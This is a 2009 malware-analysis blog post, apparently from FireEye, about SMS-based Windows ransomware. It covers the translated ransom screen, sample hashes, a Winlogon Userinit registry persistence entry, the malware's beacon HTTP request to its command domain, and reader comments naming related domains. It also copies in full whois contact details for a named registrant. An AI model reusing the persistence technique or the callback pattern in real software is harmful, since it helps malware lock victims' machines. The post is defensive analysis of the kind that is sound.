RansomWare on the loose..
Update: A little more investigation revealed to me how this SMS-based ransom works. These SMS codes use paid "rooms". These "rooms" have a concept like 1900 numbers where it costs money to phone in. Every time someone sends an SMS to one of these rooms, a fixed amount of money is deducted from the sender's balance and it gets transferred to the owner of the room.
There has been a disturbing uptick in "Ransomware" over the past couple weeks. Most modern malware try their hardest to keep the user from knowing their presence on the system, but due to the type of malware that Rogue AVs and Ransomware are, they are as in-your-face as they can be. Recently I got a chance to analyze a couple of these pieces of malware. One of the samples I looked at was 6211D3AF9D2EE3DCD44C948A4ECF6633. Upon execution, this malware blocks the user's access to all Windows resources and asks the victim for money (ransom) in return for unlocking their system.
After getting infected, the only thing the user can see will be the following message, which appears to be in Russian (Cyrillic):
With the help of an online Russian keyboard and Google Translate, I was able to translate this text into readable English. Here is the translated text, which isn't perfect, but you should be able to glean the jist:
"Windows blocked
to unlock the need to send an sms with the text
412857964
to number
3649
Enter the resulting code:
attempt to reinstall the system may lead to loss
important information and violations of the computer"
Obviously these guys are doing it to get some quick ransom money. I'm not sure what happens when victims contact these guys via SMS, as it's region specific. I suspect the code mentioned above (412857964) is dynamically generated by the malware and the unlocking key will be created using this code once the malware authors receive the ransom.
Note: Symantec recently wrote a technical report about this malware threat and also provided a tool to generate the unlock key. Unfortunately, this tool doesn't work for the variant mentioned above. Instead of having a 10 or 11 digit code starting with 411, this new variant has 9 digit code and it starts with 412. Another interesting fact as shown in the VirusTotal report, of the 19 listed AVs which detected this malware as a threat, Nortron Anti-Virus is not one of them.
Here are some of the notable changes this malware makes on the victim's PC.
It creates a startup registry entry like this:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ Userinit =C:\WINDOWS\System32\userinit.exe,c:\malware.exe
This means that everytime the user tries to login to the system, along with userinit.exe (A legitimate windows process responsible for loading user profiles which contain desktop themes, fonts, wallpapers, etc) a malware instance will be launched at the same time.
Here is the observed outbound communication:
GET /registerguid.php?guid={98607c80-9a71-494f-a81e-32b7bb536a0c}&wid=59&u=6&number=35743798&install=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: ogggooogoggoog.com
Connection: Keep-Alive
Whois lookup for ogggooogoggoog.com is the following:
Domain Name: OGGGOOOGOGGOOG.COM
Registrant:
Damir I Filatovskij
Damir I Filatovskij (
)
ul. Kuncevskaja 134/2 11
Moskva
Moskva,120023
RU
Tel. +7.4992746592
Fax. +7.4992746592
Creation Date: 04-Mar-2009
Expiration Date: 04-Mar-2010
Domain servers in listed order:
dns2.naunet.ru
dns1.naunet.ru
Administrative Contact:
Damir I Filatovskij
Damir I Filatovskij ()
ul. Kuncevskaja 134/2 11
Moskva
Moskva,120023
RU
Tel. +7.4992746592
Fax. +7.4992746592
Technical Contact:
Damir I Filatovskij
Damir I Filatovskij ()
ul. Kuncevskaja 134/2 11
Moskva
Moskva,120023
RU
Tel. +7.4992746592
Fax. +7.4992746592
Billing Contact:
Damir I Filatovskij
Damir I Filatovskij ()
ul. Kuncevskaja 134/2 11
Moskva
Moskva,120023
RU
Tel. +7.4992746592
Fax. +7.4992746592
Status:ACTIVE
Unfortunately, this is not the end of Ransomware. Here is the another sample I found (1587c55956d7df0673b4bebe1dfd2de3) that has a different look and feel, but the same overall intent. There are a few differences as well like this one also modifies registry keys to disable Windows "Safe Mode".
In this case I am not completely able to understand the language used on line number 7 to 9 except for words like 6008, SMS, and flip. However, the reason for this existing (hijacking a victim's OS) is clear. It would be great if some readers could point me in the right direction as to how to render this text such that it can be translated. I suspect a character encoding/language pack mismatch.
Luckily, these two pieces of malware do not attempt to corrupt user data files like we saw in the case of FileFixer (another ransomware). Re-imaging the infected machine essentially rid you of these pieces of malware, but this is obviously very cumbersome. The old method of having a system drive and a data drive would have saved you from any major data loss. This also makes it easier to reimage in the future. And with 1TB hard drives being sub-$100, there's no excuse not to back up your data!
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM
in last screenshot the "strange" language is russian but in wrong encoding.
Posted by: Mart | 2009.04.22 at 12:11 AM
Do we know who's providing the SMS shortcode number?
Posted by: MysteryFCM | 2009.04.22 at 08:06 AM
Found two other related domains that resolve to the same IP as ogggooogoggoog.com. They are 9aga999a9gg99a.com and zsgszzzszggzzs.com. File requests are a little different, (getid.php?getcode=1&wid=53&client=Explorer.EXE&u=1), but it's obviously the same family of ransomeware.
Posted by: Matt Sully | 2009.04.22 at 08:18 AM